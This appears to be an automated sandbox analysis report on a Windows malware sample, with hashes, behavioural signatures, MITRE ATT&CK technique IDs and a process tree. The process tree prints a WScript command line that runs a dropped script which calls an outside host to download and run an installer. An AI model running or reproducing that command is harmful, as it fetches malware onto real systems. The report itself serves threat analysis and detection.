af4992f0f8662d0c1612f259eae2514ed8262c46bc2aecc1d0f6fb54be030a93

Analysis

max time kernel
187s
max time network
190s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
04/12/2022, 11:56

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

af4992f0f8662d0c1612f259eae2514ed8262c46bc2aecc1d0f6fb54be030a93.exe
Size

184KB
MD5

82aece4141bb6f809ae856cc1957a154
SHA1

a6c5a3c75286d2b90283350bf2a5d9adcaee083d
SHA256

af4992f0f8662d0c1612f259eae2514ed8262c46bc2aecc1d0f6fb54be030a93
SHA512

33fb7361898a78720098bdd609df88e8a7b11b14ea895c4734f039e7c83ee337b00663dbece851ed3323603737c9606afa0e3f4ae72778c69caa06a0a5c955d7
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO31:/7BSH8zUB+nGESaaRvoB7FJNndno

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 9 IoCs

flow	pid	Process
32	1056	WScript.exe
34	1056	WScript.exe
51	1056	WScript.exe
59	1056	WScript.exe
84	1056	WScript.exe
93	1056	WScript.exe
99	2656	WScript.exe
100	2656	WScript.exe
101	4724	WScript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	af4992f0f8662d0c1612f259eae2514ed8262c46bc2aecc1d0f6fb54be030a93.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\Local Settings	af4992f0f8662d0c1612f259eae2514ed8262c46bc2aecc1d0f6fb54be030a93.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	32	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	99	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1728 wrote to memory of 1056	1728	af4992f0f8662d0c1612f259eae2514ed8262c46bc2aecc1d0f6fb54be030a93.exe	82
PID 1728 wrote to memory of 1056	1728	af4992f0f8662d0c1612f259eae2514ed8262c46bc2aecc1d0f6fb54be030a93.exe	82
PID 1728 wrote to memory of 1056	1728	af4992f0f8662d0c1612f259eae2514ed8262c46bc2aecc1d0f6fb54be030a93.exe	82
PID 1728 wrote to memory of 2656	1728	af4992f0f8662d0c1612f259eae2514ed8262c46bc2aecc1d0f6fb54be030a93.exe	97
PID 1728 wrote to memory of 2656	1728	af4992f0f8662d0c1612f259eae2514ed8262c46bc2aecc1d0f6fb54be030a93.exe	97
PID 1728 wrote to memory of 2656	1728	af4992f0f8662d0c1612f259eae2514ed8262c46bc2aecc1d0f6fb54be030a93.exe	97
PID 1728 wrote to memory of 4724	1728	af4992f0f8662d0c1612f259eae2514ed8262c46bc2aecc1d0f6fb54be030a93.exe	98
PID 1728 wrote to memory of 4724	1728	af4992f0f8662d0c1612f259eae2514ed8262c46bc2aecc1d0f6fb54be030a93.exe	98
PID 1728 wrote to memory of 4724	1728	af4992f0f8662d0c1612f259eae2514ed8262c46bc2aecc1d0f6fb54be030a93.exe	98

C:\Users\Admin\AppData\Local\Temp\af4992f0f8662d0c1612f259eae2514ed8262c46bc2aecc1d0f6fb54be030a93.exe
"C:\Users\Admin\AppData\Local\Temp\af4992f0f8662d0c1612f259eae2514ed8262c46bc2aecc1d0f6fb54be030a93.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1728
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf104C.js" http://www.djapp.info/?domain=sZBfpIYtnm.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf104C.exe
  2⤵
  - Blocklisted process makes network request
  PID:1056
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf104C.js" http://www.djapp.info/?domain=sZBfpIYtnm.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf104C.exe
  2⤵
  - Blocklisted process makes network request
  PID:2656
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf104C.js" http://www.djapp.info/?domain=sZBfpIYtnm.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf104C.exe
  2⤵
  - Blocklisted process makes network request
  PID:4724

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\fuf104C.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit